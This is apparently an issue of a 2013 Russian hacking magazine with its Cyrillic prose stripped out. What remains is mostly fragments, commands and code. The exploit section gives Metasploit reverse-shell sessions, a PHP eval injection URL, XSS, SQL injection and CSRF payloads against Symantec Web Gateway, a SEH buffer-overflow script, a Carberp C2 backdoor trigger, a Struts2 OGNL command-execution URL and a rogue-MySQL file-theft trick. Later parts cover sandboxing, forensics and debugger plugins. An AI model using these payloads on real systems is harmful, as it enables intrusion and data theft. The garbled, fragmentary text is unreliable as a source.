, ,
XPS-.

EXPLOIT
Metasploit, .

msf > use exploit/windows/fileformat/corelpdf_fusion_bof


msf exploit(corelpdf_fusion_bof) > set PAYLOAD windows/
meterpreter/reverse_tcp
msf exploit(corelpdf_fusion_bof) > set 192.168.24.141
msf exploit(corelpdf_fusion_bof) > exploit

Corel PDF
Fusion

09
07 /174/
/176/ 2013

73

JAVA APPLET
PROVIDERSKELETON
CVSSv2:
:
:
CVE:

9.3 (AV:R/AC:M/Au:N/C:C/I:C/A:C)
18 2013
Adam Gowdiak
2013-2460

Java. invoke() ProviderSkeleton.


-, . (bit.ly/13RcwV8)
Security Explorations , . () lookupClass,
forName, .

Windows

EXPLOIT

TARGETS

, Metasploit- :

InstantCMS =< 1.6. ,


1.7, .

msf
msf
set
msf
msf

> use exploit/multi/browser/java_jre17_provider_skeleton


exploit(java_jre17_provider_skeleton) >
PAYLOAD java/meterpreter/reverse_tcp
exploit(java_jre17_provider_skeleton) > set 192.168.24.141
exploit(java_jre17_provider_skeleton) > exploit

(bit.ly/179thsk) .

TARGETS
Java 7 update 21 .

SOLUTION
.


INSTANTCMS 1.6
CVSSv2:
:
:
CVE:

N/A
26 2013
AkaStep
N/A

CMS, - .
(, ). ,
eval.

if ($look == 'phrase'){
$against .= '\"'.$query.'\"';
}
...
eval('search_'.$component'link' (.'("'.$against.'",
"'.$look.'", "'.$mode.'");');
, ,
:

site.com/index.php?view=search&query=
${echo phpinfo()}&look=allwords

phpinfo().

EXPLOIT
:
phpinfo() . , , .
AutoIt. .
Metasploit-.

SOLUTION
. ,
htmlspecialchars().


SYMANTEC WEB GATEWAY 5.1.0
CVSSv2:
:
:
CVE:

N/A
27 2013
Wolfgang Ettlinger
2013-1616, 2013-4670, 2013-4671, 2013-4672


Symantec. Symantec Web Gateway

. ,
Insight .
210 ,
,
. :
1. XSS cookies
.
2. XSS
. ,
.
3. , .
apache. (,
),
.
4. (, apache) - sudo.
5. SQL- ,
SQL-, .
6. CSRF ( ) , .
,
, . .

EXPLOIT
XSS alert():

74

09
07 /176/
/174/ 2013

https://<host>/spywall/feedback_report.php?rpp=0%27%20
onfocus=%22alert%28%27xss%27%29%22%20autofocus/%3E
1. XSS blocked.php,
. , u:

https://<host>/spywall/blocked.php?id=1&history=-2&u=%27/
%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E
2. , (Test Ping), , (\`). apache.
/spywall/nameConfig.php /spywall/networkConfig.php.
3. /etc/sudoers apache admin
. , apache , chmod, chown insmod, .
4. SQL- ,
:

https://<host>/spywall/feedback_report.php?variable[]=1)
UNION SELECT 1,2,3,4,username,6,7,8,9,password FROM users
--&operator[]=notequal&operand[]=x
https://<host>/spywall/edit_alert.php?alertid=11%20UNION%
20SELECT%201,2,username,password,5,6,7,8,9,10,111,12,13,14,
15,16,17,18%20FROM%20users%20--%20

Symantec Web Gateway

Symantec Web Gateway

SOLUTION
5. CSRF LDAP- :

POST /spywall/ldapConfig.php HTTP/1.1


Host: <host>
Cookie: PHPSESSID=<valid-cookie>
Content-Type: application/x-www-form-urlencoded
Content-Length: 247
posttime=9999999999&saveForm=Save&useldap=1&ldap_host=
0.0.0.0&ldap_port=389&auth_method=Simple&search_base=dc%3D
test%2Cdc%3Dlocal&ldap_user=test&ldap_password=test&dept_
type=dept&user_attribute=sAMAccountName&user_attribute_
other=&ldap_timeout=168
CSRF- posttime,
unix timestamp.
, . , 9999999999, .
, :
1. , Symantec Web Gateway,
, , iframe.
(, EICAR-)
(XSS).
2. Symantec Web Gateway blocked.php. history=-2 ( ), /
(XSS) (Blocked Feedback) .
3. , . ,
, .
4. apache chmod chown
, SUID-.
5. () .
, . ,
XSS- . ,
,
.

TARGETS
Symantec Web Gateway <= 5.1.0.*.

AUDIOCOVER 0.8.22
CVSSv2:
:
:
CVE:

N/A
1 2013
metacom, onying
N/A

1 2013 0.8.18,
M3U. , lst 0.8.22 .
-, , .

EXPLOIT
:

# X -,
shellcode = "\x89\xe0..." +
file = "fuzz.lst"
head = "http://"
junk = "\x90" * 765

c msfpayload
X
#
#
# ,
# EIP
# 6
# ... RETN libiconv-2.dll

nseh = "\xEB\x06\x90\x90"
seh = "\xEE\x04\x01\x66"
nops = "\x90" * 80
textfile = open(file , 'w')
textfile.write(head + junk + nseh + seh + nops + shellcode)
textfile.close()

TARGETS
AudioCover 0.8.22 .

SOLUTION
.


APPLE QUICKTIME 7
CVSSv2:
:
:
CVE:

7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
24 2013
Tom Gallagher, Paul Bates
2013-1017

09
07 /174/
/176/ 2013


Apple QuickTime.
.
MOV.
- , rdrf dref, Alis.
, ,
, -
. .
.

EXPLOIT
, :

mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov
mov

=
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<
<<

"\x00\x00\x06\xDF" #
"moov"
# moov
"\x00\x00\x06\xD7" # (1751d)
"rmra"
# moov
"\x00\x00\x06\xCF" # (1743d)
"rmda"
# rmda
"\x00\x00\x06\xBF" # (1727d)
"rdrf"
#
"\x00\x00\x00\x00" # 0
"alis"
# : FS alis
"\x00\x00\x06\xAA" # (1706d)
rand_text_alpha(8)
"\x00\x00\x06\x61" # (1633d)
rand_text_alpha(38)
"\x12"
rand_text_alpha(81)
"\xFF\xFF"
rand_text_alpha(18)
"\x00\x08"
# (8d)
rand_text_alpha(8)
"\x00\x00"
"\x00\x08"
# (8d)
rand_text_alpha(8)
"\x00\x00"
"\x00\x26"
# (38d)
rand_text_alpha(38)
"\x00\x0F\x00\x0E"
"AA"
# ( )
rand_text_alpha(12)
"\x00\x12\x00\x21"
rand_text_alpha(36)
"\x00"
"\x0F\x33"
rand_text_alpha(17)
"\x02\xF4"
# (756h)
rand_text_alpha(756)
"\xFF\xFF\x00\x00\x00"
buf
#

QuickTime
Apple (bit.ly/13CSNW0).
HTML-
Metasploit-:



Carberp

75

msf
msf
set
msf
msf

> use exploit/windows/browser/apple_quicktime_rdrf.rb


exploit(apple_quicktime_rdrf.rb) >
PAYLOAD windows/meterpreter/reverse_tcp
exploit(apple_quicktime_rdrf.rb) > set 192.168.24.141
exploit(apple_quicktime_rdrf.rb) > exploit

TARGETS
QuickTime 7.7.3 .

SOLUTION
.


CARBERP WEB PANEL C2
CVSSv2:
:
:
CVE:

N/A
28 2013
Xylitol
N/A

. Zeus,
Carberp
- . Xylitol :

if(@$_POST'id' ( == 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV'){
//Rkey end
if(!empty($_POST'data' ()) eval(pack("H*",
base64_decode($_POST'data' ()));
exit;
, POST-
BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV id, , Base64
data.

EXPLOIT
:
(bit.ly/18NBXeL).
,
.
Metasploit-.
, POST-. , PHP
:

// ,
// Base64
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => '...');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST'urlz' ( . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);

TARGETS
, 28 . , :).

SOLUTION
. BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV .

76

09 /176/ 2013



1-DAY VS 0-DAY,

STRUTS2

whitehat, security, ZeroNights
.
Principal Security Engineer
Nokia,
HERE.

16
Apache Foundation
advisory Struts2. ,
, ONGL- ( Struts2), , , . ,
.
ONGL:
struts.apache.org/release/2.3.x/docs/s2-016.
html. , ID ( ):

http://host/path/blah-blah.action?
redirect:${('#zlo%5C75@java.lang.
Runtime@getRuntime().exec("id")')(e)}
, ${ .. }, ONGL-.
:

, . , , ,
, .
http://host/path/blah-blah.action?
redirect:${31338-1}

http://host/path/31337
, ONGL- (
). ,
. , Struts , ,
,
, .
, .

1-DAY OR 0-DAY
, , 0-, , , . , ,
.
,

, RCE.

16- ( , - ). , -
(kuxoo.com/archives/260).
-, ,

. .
1-... ,
? ,
. ,
Struts2. QA... , , ,
CERT, ... ,
struts.apache.org . Who cares?


-,
, , , . , , ... .
, ,
PCI DSS,
!
17- ... . , 24 ,
, ... , ,
. , ... .
, ,
(
26- ,

09 /176/ 2013

, Apple :)

)! , , . , CISO, , ,
, ... ,
( , ,
, , , ). , HIDS, ... (, 25- ,
).
, , ,
? QIWI. ,
Struts2. 18- .
, ,
, IP . QIWI. QIWI ,
, ,
- .
QIWI , . ,
1617 .
18
IP- .

( ) - , .
, CERT 22 , ... -
. , developer.apple.
com. Struts2
... - .
Apple, ,
OVH.
com ( ).
- email VPN... Struts2, ! , ,
- ... ,
: , ,
. ,
, , IT
Security, .

...

QIWI , , :).

77

shell- Apple.

, - , ,
, , . , -.
,
.
- . , :
Sony Entertainment
Network Struts2, Apple expresslane.apple.com.
( )
.
, ( 1819- ). , ,
POST. ,
.
Sony, Apple
;
, ,

, WaF IPS,
.


. ,
, PCI
DSS ISO, CISO . ,
, !
, , , . ,
(,

, ). , ,
,
, security/response-
.
CISO- , , .
: , , , , , ,
, :).

,
- ...

Shell- Sony.
, -
.

WARNING


. ,

,
.

78

09 /176/ 2013

WARNING


. ,

,
.


@GiftsUngiven


@cyberpunkych


@dsbaranov


@ygoltsev



.
,

0-day-
SQL- LOAD DATA LOCAL INFILE
.


, -.
. :
, MySQL- , ,
. , MySQL- .
:
, , rdot.

MySQL
. . - , ,
, , ,
! ?

09 /176/ 2013

79

2. , ,
.
3. .
, ?
, 3. , .
, .
MySQL-
#2,
, !
? !

!

rogue_
#1

org (bit.ly/14rYQA9). : ,
,
?
! LOAD DATA
LOCAL,
. , . ,
,
, .
LOAD DATA
LOCAL INFILE, .

, rdot.org (bit.ly/yqUzYw). , , select .
, . ,
.
. , LOAD
DATA LOCAL - .
: ,
,

. , - , , ,

- . .
! ,
SQL- ? :)

Python,
MySQL-, .
?

LOAD DATA LOCAL #2

:
, .
. LOAD DATA LOCAL
INFILE . IP , :
1. , LOAD DATA LOCAL INFILE "C:\\
Windows\\system32\\drivers\\etc\\hosts" INTO
TABLE mysql.test.

#3

80

09 /176/ 2013


INTERCEPTER-NG
,
MySQL
MITM-
.
, LOAD DATA LOCAL,
:). Ares, Intercepter
(intercepter.nerf.ru),


.
.
,
,
.

, LOAD DATA LOCAL

mysql. ,
MySQL ( ,
) . :
1. SELECT * FROM
mysql.user (1).
2. : -
c:/boot.ini (2).
3. ? , (3).
Python,
MySQL-, (
boot.ini). ?

IN THE WILD
: python rogue_mysql.py. .
? ,
phpMyAdmin
MySQL.
. :

<?php
$conn = mysql_connect

boot.ini

($_GET['mysql_host_port'],
'root', '12345');
mysql_query('SELECT *
FROM mysql.user');
?>
:
honeypot,
/.
. , rogue_mysql.py,

hosts, , :).


, , (
?), MySQL- , LOAD DATA
LOCAL. (
,
GUI- Mac, MySQL-, Ubuntu;
, PT .
. ).
, , ,
, Server
Greeting. .

Intercepter-NG


, LOAD DATA
LOCAL , , ,

.
,
,
. ,
,
MySQL
LOAD DATA LOCAL,
. .
, .
, .
,
. , : !
!

82

,

coffein.h@gmail.com

09 /176/ 2013

09 /176/ 2013

83




Cuckoo Sandbox


,
.


. ,

Cuckoo Sandbox
.

, . , Windows
Vista Windows 7, OS X. (-) GNU/Linux.
, , Cuckoo Sandbox :
Win32 API , ;
, , , ;
;
PCAP;
, ;
;
VirusTotal (virustotal.com).

Cuckoo Sandbox Python .



: KVM, VirtualBox, VMware.
Microsoft Windows XP SP3. ,
, -


Windows (*.dll), PDF Microsoft Office, URL- PHP-.
,

.

Cuckoo Sandbox ( ).
, , () .
,
.
. , , :
( , );
;
.

. 1.

84

09 /176/ 2013

. 2.

. 3. HTML

, Python: MarkupSafe-0.18,
setuptools-0.9.6. , (-) GNU/Linux. Windows. , ,
Windows XP SP3.
( ),
. .
, Cuckoo Sandbox Book (bit.
ly/14w9oky) (- cuckoo\docs\book),
,
Linux. .
Cuckoo Sandbox
Cuckoo\conf\. cuckoo.conf . IP- , cuckoo. ,
tcpdump.
exe, , . , .
( Windows) tcpdump D.
processing.conf .
, . reporting.conf ,
.

Cuckoo Sandbox :
Python (2.7);
SQLAlchemy (0.7.10);
;
(KVM, VirtualBox VMware);
tcpdump .
, :
Dpkt ( ): ;
Jinja2 ( ): HTML-;
Magic (): ;
Pydeep (): ;
Pymongo (): ,
MongoDB ;
Yara Yara Python (): Yara ( svn-);
Libvirt ():
KVM;
Bottlepy (): web.py
api.py ( utils, );
Pefile ():
PE32;
Python Image Library ():
( ), .

WINDOWS

, , ,

, , .


Magic pyd
pydeep.
Magic
Cuckoo Sandbox
.


(bit.ly/ra2fR0).

,

.



( ). .

python-magic

: bit.ly/19II1ES.
,

C:\Windows\System32

: magic1.dll, zlib1.
dll, regex2.dll.
.
pydeep, ssdeep (
ssdeep-2.9-0.3),
fuzzy- ( ).
. ,
, ,
. , ssdeep
. . , Windows
Python 2.7 ( ),
GCC (MinGW) Cython.
Python , MinGW
Cython. Cython
, -

09 /176/ 2013

85


,
,

. 4.



,
, .
.
.
IP-(), ()
. .
,
(
) ( Windows).
,
, .
, ( ).
(bit.ly/13H7Opy).
<machinemanager>.conf,
,
,
, IP- .
. cuckoo.py, -

MinGW. ,

, PATH
c:\mingw\bin.
.
Python,
MinGW.
Python27\Lib\distutils\. distutils.cfg (
) :

[build]
compiler = mingw32

cygwinccompiler.py,
. self.set_executables(...)

cuckoo.
. 1. ,
, , .


Cuckoo,
-, web.py,
cuckoo\utils.
http://127.0.0.1:8080.
, .
.

: bit.ly/16uw9TR bit.ly/12Upeo7.
,
(. 2).
, .
-, submit.py cuckoo\utils.
-. (. 4).
.
cuckoo\storage\analyses\ (. 5).

CygwinCCompiler (UnixCCompiler)
Mingw32CCompiler (CygwinCCompiler),
Cython.
.
, ssdeep.
.
setup.py
(ssdeep) Windows
./configure && make. ,
.
, , Cygwin. Cygwin

make. Cygwin setup.py (ssdeep):
class BuildExtension(build_ext.
build_ext)

(cd ssdeep && ./configure && make)

(cd ssdeep && sh configure && make),


Cygwin ./.
Cygwin,
ssdeep-2.9-0.3\ssdeep\

sh configure && make



Windows
setup.py install (ssdeep).
,
,
ssdeep .

86

,
Cuckoo Sandbox. , , ,
, .



:
1.
.
2. .
3. .
4. () .
5. .


,
. : ( )
.
( )
. (system-host). (system-host)
. ,
- .

. 7.

09 /176/ 2013

, , :
1. () .
2. , .
3. .
. ICMP API IcmpSendEcho.
API- ip_option_
information ( IP-), icmp_echo_reply, ICMP- (
).
:

var
SearchRec: TSearchRec;
begin
if (FindFirst('\\'+IP- (+'\'+
(+'\*.*', faAnyFile, SearchRec) = 0) then
begin
repeat
// ,
//
//
// ,
if not ( ( SearchRec.name = '.' ) or
( SearchRec.name = '..' ) ) then
begin
ForceDirectories(PChar('[ /
]'+'\'+[] +'\'+ 'ip- '));
CopyFile(PChar('\\'+IP- (+'\'+
(' +SearchRec.name), PChar([ /
]'+'\'+[] +'\'+
'IP- + '\'+SearchRec.name),true);
end;
until (FindNext(SearchRec)<>0);
FindClose(SearchRec);


, .
, , -, .

, , .
,
. :
( ), (, systemhost, SpyEye),
(jar_*.tmp, xkjhaqw*, 0.* );
(*.exe, *.dll, *.class, *.jar/*.jad, *.pdf );
.

, ,
. .
:
1. .
2. : .
3. , , , .
1.

, . , ,
, , Local Settings, Temp, Sun\Java\Deployment\
cache\6.0\*, Startup .
. .

:
, ,
: <done>_< >.<id
>;
( ).

. 5.

. 6. ,

end;

09 /176/ 2013

87

DVD

,
,
.

. 7.

. .

:

if ( Pos(filename,SearchRec.name) > 0) then


begin
if (Copy(SearchRec.name, 1,5) = 'done_')then
begin
result:=true;
exit;
end;
...
else
result:=false;
...
, submit.py, .

function sendFileCuckoo(path, filename:string):integer;


var
exp:string;
begin
...
if exp = 'exe' then
testFile('--package '+exp+' '+path+filename);
if exp = 'doc' then
testFile('--package '+exp+' '+path+filename);
if exp = 'dll' then
testFile('--package '+exp+' '+path+filename);
if exp = 'pdf' then
testFile('--package '+exp+' '+path+filename);
...
end;

submit.py:

function testFile(param:string):integer;
begin
CreateProcess(nil, PChar('python D:\cuckoo\utils\submit.
py '+param), nil, nil, True, CREATE_NEW_CONSOLE, nil,
nil, startupinfo, processinformation);
...
end;
,

.
, - , ,
,
, .
- REST API, REST-.
, API-
(JSON) Cuckoo Sandbox, , .
: bit.ly/1c3VoBz.
-, .


,
.
, , . .

88

09 /176/ 2013

Blackhole
exploit kit


@c3retc3, cload.ru

the
h b
he
bada
a stro
ttro
ronome
omerr@fl
o
om
f ickr
k .c
kr
.co
.com
co

-
, , ,
. - Blackhole
exploit kit v2.0.1 :
. , , - (blackbox-,
- ).
, : . ,
- ( )
Blackhole exploit
kit
, -
.

BLACKHOLE?

. -

, ,
:
1. URL.
.
2.
.
3. captcha ( ).
4. Memcached

5.

6.

7.

8.

.
Windows 8 ,
.

.
URL .

.

(
, ,

13 000 IP, Tor-
).

:
(XSS)

. 1. - Blackhole exploit kit

(Cross Site Scripting aka


XSS) -,

( , ?).
( , registers.php)

. -
.

09 /176/ 2013

. 2. FileUrl JS-

registers.php - FileUrl (
) Title ( ).
, HTML/JS- ,
(. 2).
- XSS.

HTML-
JS-.
HTML5

-. ,
- Geolocation API (. 4).

: SESSION FIXATION
Blackhole exploit kit

ookie - type sort, -

89

. 3. HTML- ( <img> )
XSS

registers.php. . 6 ,
type registers.php Fake_Cookie.

. : +desc. ,
.

, , .

session fixation,
(, , cookie).
,
, ()
Logout. , -

,
.

:

- , -
.
- ,
CSRF UI redressing (aka Clickjacking).
(
, ).

:
.
Blackhole exploit kit -. ,
(-. . .)
(! . .)
.

. 4. HTML5 Geolocation API


XSS-

. 5.

Title
( )

. 6. Fake_Cookie sort

90

09 /176/ 2013


, ,
,
. , ,
,
, , ,

.

,


.


,
?
.
,
. , , . ,
, . , .
, , ,
. ,
. , , . .
, , , .


,
. , , TrueCrypt, BitLocker PGP Disk.
, ,
Elcomsoft Forensic Disk Decryptor.
, , .

,
,
Belkasoft Research
contact@belkasoft.com

,
; , ; ,

, .
. -
- ,
. , , ,
, .

, .




.
.
: USB-,
, Live RAM Capturer
(ru.belkasoft.com/ru/memory-dump)
Belkasoft, .

. , -

09 /176/ 2013

,
,
.
, ,
, ,

(, Karos).
,


.


.
, .
,
, ,
,
.


CaptureGUARD Gateway,
WindowsSCOPE

Belkasoft Live RAM Capturer (-,
, ...).
, . 32- 64-
, , .
( )
( ) , .

.
:
?
.
Live RAM Capturer ,
. ru.belkasoft.com/ru/memory-dump.

91


Belkasoft Live RAM
Capturer

,
.
, ,
? ,
.

.

IEEE 1394,
FireWire i.LINK. FireWire

DMA. ?
, .
, ,

,
FireWire.

( ,
Inception pyfw, Python, ; , ),

.
. , Linux OS X
Inception (bit.ly/yz09Ff).
, FireWire?

-. , . ,
PCMCIA, CardBus ExpressCard,
. , USB, .
,
,
iPhone, bit.
ly/60FDdS.
FireWire? , :
FireWire
, . OS X
, FireWire, .
Windows : FireWire
; , Windows 8 .

. ,
. ,
( )
. .

.

92

09 /176/ 2013

?

. ? , ,
.

, ,
, , ,
, ,
.

, . ,
. - ,
. , , .

, (,
, . ,
). , , ,
.

Belkasoft Evidence
Center


,
, , () .
:
, ( Chrome).
:

. ,
( ) .
- ,
. .
, :
, .
, JPEG
JFIF. ,
. , , , .
.

? ,
,
.
,
. , Windows
.

, .
, . .

, .
Belkasoft Evidence Center (belkasoft.com),
,
.
, . ,
,
.



Guidance EnCase

:
Elcomsoft Forensic Disk Decryptor (elcomsoft.com) , TrueCrypt, BitLocker PGP
Disk. ;
Passware Kit Forensic (passware.com) , TrueCrypt, BitLocker PGP Disk. FireWire-.
;
Belkasoft Evidence Center (belkasoft.com) ,
,
; ,
, . ;
Guidance EnCase (guidancesoftware.com)
, . -
, .
.


-
.

09 /176/ 2013

: , .

,
, ,
.

.
, (). ,

.
,
. : ,
, .

93

WWW
FireWire
:
bit.ly/EvKED,
bit.ly/60FDdS



?
, .
, .
.
? , ,
,
,

, .

VPN-. ,
- ,
.
,
(
). , .


-.
, . ?
(
, ,
- ),
,
, .
, .
. , , ACPO
(Association of Chief Police Officers) :
. ?
,
(,
).
.

.
,
.

Elcomsoft Forensic Disk


Decryptor

(
, , ).

.

,

. Android (bit.ly/Xa9XXN).

Android 4.0 .
,
, . ,
.
, ,
.

, .

Android :

fastboot;
, USB.
,
.

, ,
15 . . ,


. : ,
.
. FROST, : bit.ly/Xa9XXN.

.
.

:
. ? , ,
.

, ,

94

09 /176/ 2013





OllyDbg
32- (ring 3).
: , ,
,
,
.

500 ,
.

OLLYDUMPEX
: bit.ly/16Db6B1
: OllyDbg 1.10/2.01, ImmunityDbg 1.7/1.8, IDA Pro, WinDbg 6
, -,
,
,
. , .
. , -
, , . OllyDumpEx
:
OllyDbg 1/2, Immunity Debugger 1.7/1.8, IDA Pro, WinDbg. :
EXE-, DLL ;
MZ/PE- ;
PE32+;
64- ( IDA Pro);
( );
;
RVA DataDirectory ImageBase;
(RawSize, RawOffset,
VirtualOffset ).

OllyDumpEx


ser-storchak@mail.ru,
@ser_storchak,
ser-storchak.blogspot.ru

09 /176/ 2013

95

OLLYMIGRATE
: bit.ly/1btgT9i
: OllyDbg 1.10/2.01, ImmunityDbg 1.7/1.8, IDA Pro, WinDbg 6
, ,
.
, ,
.
OllyDbg, Immunity Debugger,
WinDbg IDA Pro. ? OllyMigrate Plugin
.
, . ,
OllyDbg OEP (Original Entry Point),
Immunity Debugger ,
Python-, Import Table.
, : OllyDbg 1/2, Immunity
Debugger 1.7/1.8, IDA Pro, WinDbg. :
;
.

DVD


, .

OLLYSOCKETTRACE


OllySocketTrace.

WWW

: bit.ly/1eCz9hO
: OllyDbg v1.10


OllyDbg:

, .
, ,
, .

: WSASocket, WSAAccept, WSAConnect, WSARecv,
WSARecvFrom,
WSASend,
WSASendTo,
WSAAsyncSelect,
WSAEventSelect, WSACloseEvent, listen, ioctlsocket, connect,
bind, accept, socket, closesocket, shutdown, recv, recvfrom, send
sendto.
, , . OllySocketTrace

, . ,
OllySocketTrace Log.

OpenRCE: OllyDbg
Plugins (bit.ly/h3M05d)
Tuts 4 You: OllyDbg
Archive (bit.ly/1eDJdr4)

Immunity Debugger

OLLYHEAPTRACE
: bit.ly/13ccnOf
: OllyDbg v1.10

. ,

,
,
.
(RtlAllocateHeap, RtlFreeHeap, RtlCreateHeap, RtlDestroyHeap, RtlReAllocateHeap, RtlSizeHeap, GetProcessHeap
and RtlInitializeCriticalSection, RtlDeleteCriticalSection) , .

:
;

;
.

?
Plugins.
,
/ . DLL-
,
:

OllyDBG v1.10: Options Appearance


Directories. Plugin path .
OllyDBG v2.01h: Options Options Directories.
Plugin directory .

Plugins.

96

09 /176/ 2013

INJECTHOOKLIB
PYLLOW
: bit.ly/19lNH8N
: OllyDbg v2.01


OllyDbg
. ,
,
,

,
.
,
.


:
Colours
ollydbg.ini.

[Colours]

.


: bit.ly/1cGR2zr.

Immunity Debugger?
, , IDA,
Python. ,
, .
OllyDbg , ( ODbgScript).
, Pablo Escobar OllyDbg,
Python, Pyllow.
, ,
OllyDbg API. , .
Visual Studio 2010,
Boost, Boost.Python 32-
Python 3.x ( 3.2). , , Boost Python,
. , /boostdir/tools/build/v2/user-config.jam :

: bit.ly/19X2GoR
: OllyDBG v1.10
, .
, (bit.ly/OjxUMj Windows XP, bit.ly/
NZW6Ci Windows 7). , ,
DLL-,
.
,
(bit.ly/168kcF2),
.

, .

using python : 3.2 : "C:/Program Files (x86)/


Python32/python.exe" # path to your Python
setup : : : 32 # x86-32 only ;
. Boost.Python :

bjam --toolset=msvc-10.0 --build-type=complete


--with-python python=3.2 address-model=32
- ,
Boost : bit.ly/14FU7xP.

user-mode

OLLYGRAPH
: bit.ly/19c55cs
: OllyDbg v2.01
, IDA Pro,
.
, ,
,
. ,
, . ,
OllyDbg, OllyGraph. -, ,
IDA Pro. , -

OllyFlow

wingraph32, . 1.10
OllyFlow (bit.ly/14lNtpb)
OllyGraph .


, , .
:
Command Bar (bit.ly/14GHQcr) Command Line. , .
PhantOm Plugin (bit.ly/qyNqJO) OllyDbg , . .
StrongOD (bit.ly/gzazAd).
PhantOm.
Olly Advanced (bit.ly/14GI0An). , , ,
OllyDbg .
ODBGScript (bit.ly/17Is2AM), ,
.
OllyDump (bit.ly/17Is4si) .

09 /176/ 2013

97

OLLYMSDN
: bit.ly/HABDmP
: OllyDbg v1.10, Immunity Debugger 1.7/1.8

MSDN

WinAPI ,
.
, /, . ,
, MSDN. online-?
- OllyMSDN. ,
WIN32.HLP (
API). ,
Olly. ,
, WinHelp() API
MSDN.
,
call Help on
symbolic name <Ctrl + F1>.

OLLYDBG PDK

,
,

,

.

PDK
Plugin Development Kit,


bit.ly/18oD7t6
.

UBERSTEALTH
: bit.ly/14AKk9r
: OllyDbg v2.01, IDA Pro
,
! ,
, .

IsDebuggerPresent .
. , .
Boost >=1.48.0, WTL (Windows Template Library) >=8.1, Windows
Driver Kit >= 7.0, DDKBuild. -,
WDK & DDK,
. , Visual Studio 2008.
, OllyDbg,
IDA Pro.

Uberstealth

DETACHME
: bit.ly/16EjhZJ
: OllyDbg v1.10
,
OllyDbg, Detach, ,
. , 1.10, ,
. , DetachMe,
OllyDbg
. , UDD-.

OLLYDBG-BACKUP
: bit.ly/15sKyhb
: OllyDbg v1.10 / v2.01
: ,
, .
UDD-. , . ,
ollydbg-backup, , CSV-,
.

OllyDbg ,

,

.
,



.
,
.

Ollydbg-backup.
CSV-

98

09 /176/ 2013

WARNING
! ! , !
D1g1 ,
Digital Security
@evdokimovds

X-TOOLS


:
hasherezade
URL: hshrzd.
wordpress.com/
pe-bear
: Win

: Jean-Philippe
Teissier
URL: github.com/
jipegit/OSXAuditor
: Mac

: David Zimmer
URL: github.com/
dzzie/VS_LIBEMU
: Win

PE-

FORENSICS TOOL MAC

PE- , must have .


-

.

PE-bear.
,
:
PE32, PE64;
;
(
);
(
RVA/File-);
;
PE-;
Explorer ( , :). . .) .

OS X Auditor
Python OS X .

,
.
:
;
;
;
;
;
.

Scdbg , libemu.
, ( ) .
,
-
, -, .
scdbg.
GUI , , windbg,
. : -, , , seh,
, DLL
. scdbg 199
API-, 12
DLL 224 .

ROP-- . .
scdbg ROP-,

advapi32.dll:

, ,
- .
malware-, .
PE
.
. , ,
,
.

, ( ,
Mac).
,
:
;

Safari, Firefox Chrome;
;
Wi-Fi-.
Team
Cymrus MHR, VirusTotal, Malware.lu .
HTML-.
Syslog-.
( ) Mac, :).

scdbg -f advapi_rop.sc -rop -raw


0x77dd1000-c:\advapi.text.dat -poke
0x77dd1404-0x7c90dc9e
scdbg

sandsprite.com/blogs.

09 /176/ 2013

POWERSHELL

, , ,
(Card
Numbers, CVV ). .
,
, , , brute force .
CC_Checker , .

: snarez
URL: github.com/
snarez/voltron
: Linux

99

BIN/IIN

Bruteforce

Last 4

4329 95

XX XXXX

1234

PowerShell. :

CC_Checker.ps1 -i INPUT_FILE -o OUTPUT_FILE -h


HASH_TYPE [1-3]

: Karl Fosaaen
URL: netspi.github.io/
PS_CC_Checker
: Win

1 = SHA-1, 2 = SHA-256, 3 = MD5.


:

123456??????1234:HASH

: Bryan Alexander
URL: github.com/
hatRiot/zarp
: Linux

: kenshoto
URL: visi.kenshoto.
com/viki/MainPage
: Win/Linux/
Mac/BSD/Solaris

GDB OLLY

OllyDbg
WinDbg Windows
, GDB *nix-.
.
GDB -

gdbinit fG!. voltron,
Python. , ,
Windows-,
.
: voltron server, view,
UI.
:
;
;
;
backtrace;
.

. Zarp
,

. , , ,

.

.
DoS-.
,

. ,
Zarp Python . :
Scapy ( );
airmon-ng suite (
);
tcpdump ();
paramiko (ssh2- Python);
nfqueue-bindings.

, , . <F8>
, SoftICE , OllyDbg .
:
IDA IDAPython;
WinDbg PyKd;
ImmunityDbg, Python, .

,
tmuxinator,
.
view TerminalView. ,
GDB.
Voltron GDB v6, GDB v7
LLDB
x86 x86_64.

Zarp , :
;
DoS;
;
;
;
;
.

Python, . malware,
.
VDB,
vtrace invisig0th
kenshoto. DEF CON CTF:
,
.
VDB (, )
.
, , , .
,
.
-.
, Win32/Win64, . : Windows, Linux,
OS X, BSD, Solaris. ,
, , ,
. GUI Qt .

100

Malware

09 /176/ 2013

bradleyp
brad
leypjohn
johnson@
son@flic
flickr.c
kr.com
om

][-:
,
2000 !

tregubenko_v_v@tut.by

09 /176/ 2013

101

90- . :,
.
! , .


IBM
PC, MS-DOS, Brain,
1986 . Brain
,
5- ,
.
, .
Brain ,
.

Brain.
, ,
. .
1987 -
,
MBR . Stoned,

: Your PC is now Stoned!
!. ,
(Legalise Marijuana). Stoned
90- . 512
( ). ,
.
13h ( BIOS),
. , , Brain Stoned,
,
,
. ,
Stoned Bootkit.

Vista
.

Mebroot ,
2007 . Mebroot

BootRoot.
Mebroot (version 0) ,
, , .
,
copy-paste (
) . , Mebroot
hi-tech-.
Mebroot Sinowal,
Sinowal (aka Torpig Anserin) 2005 , .

